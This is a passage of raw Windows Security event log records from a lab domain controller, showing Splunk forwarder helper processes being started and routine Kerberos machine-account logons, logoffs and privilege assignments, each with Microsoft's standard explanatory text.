Logon ID: 0x0
Process Information:
New Process ID: 0x196c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264295
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xcb0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264297
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x181c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264296
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1300
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264303
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E99E8
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264302
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E99E8
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62494
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264301
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E99E8
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264300
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E997C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264299
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7E997C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62493
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:02:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264298
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7E997C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:02:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264306
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EA6ED
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:02:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264305
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EA6ED
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62503
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:02:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264304
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EA6ED
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:03:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264308
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1140
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264307
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1908
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264309
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264310
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264311
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x180c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264313
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x199c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264312
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1644
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:03:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264316
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE148
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:03:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264315
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7EE148
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62516
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:03:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264314
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE148
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264327
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE5F3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264326
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE6E1
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264325
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7EE729
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:04:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264324
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
